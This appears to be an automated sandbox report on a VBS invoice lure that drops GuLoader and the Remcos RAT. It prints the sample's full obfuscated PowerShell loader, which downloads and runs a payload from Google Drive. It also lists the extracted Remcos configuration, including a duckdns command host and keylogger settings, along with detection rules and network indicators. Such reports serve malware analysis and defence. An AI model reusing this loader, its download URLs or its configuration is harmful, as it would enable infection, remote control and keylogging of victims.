Windows Analysis Report
NTS_eTaxInvoice.html.vbs

Overview

General Information

Sample name: NTS_eTaxInvoice.html.vbs
Analysis ID: 1522515
MD5: a1aeb49d80b16158b4b88efef30be753
SHA1: a7829f01f6a679b9016c1b192431a317827045b1
SHA256: adae16c4fe643a3093a6e2ac5329616ccc62d71725f208203869d90f08b3c6d1
Tags: vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1264 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok 
VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh 
rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo 
salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1812 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<same obfuscated script as powershell.exe PID 1788 above>" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1632 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 3472 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
            Source | Rule | Description | Author | Strings
            amsi64_1788.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
            amsi32_1812.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (strings listed below)
              • 0xc981:$b2: ::FromBase64String(
              • 0xb9db:$s1: -join
              • 0x5187:$s4: +=
              • 0x5249:$s4: +=
              • 0x9470:$s4: +=
              • 0xb58d:$s4: +=
              • 0xb877:$s4: +=
              • 0xb9bd:$s4: +=
              • 0x15f2e:$s4: +=
              • 0x15fae:$s4: +=
              • 0x16074:$s4: +=
              • 0x160f4:$s4: +=
              • 0x162ca:$s4: +=
              • 0x1634e:$s4: +=
              • 0xc21b:$e4: Get-WmiObject
              • 0xc40a:$e4: Get-Process
              • 0xc462:$e4: Start-Process
              • 0x16bc0:$e4: Get-Process

              System Summary

              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", ProcessId: 1264, ProcessName: wscript.exe
              Source: Network Connection, Author: frack113: Data: DestinationIp: 172.217.16.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1632, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
              Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", ProcessId: 1264, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<same obfuscated script as powershell.exe PID 1788 in the process tree above; this entry is cut off in the report>"
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-09-30T09:58:01.808212+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 172.217.16.206 | 443 | TCP

              AV Detection

              Source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: Yara match, File source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
              Source: unknown, HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32}\InprocServer32 source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2777282940.0000000007DC0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Malware configuration extractor, URLs: a458386d9.duckdns.org
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49733 -> 172.217.16.206:443
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
              Source: global traffic, HTTP traffic detected: GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2381359043.000001D36D530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2758015392.0000000021600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3$
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Yv
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1P
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1XR8l
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhp
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000003.2698660494.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2662532062.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
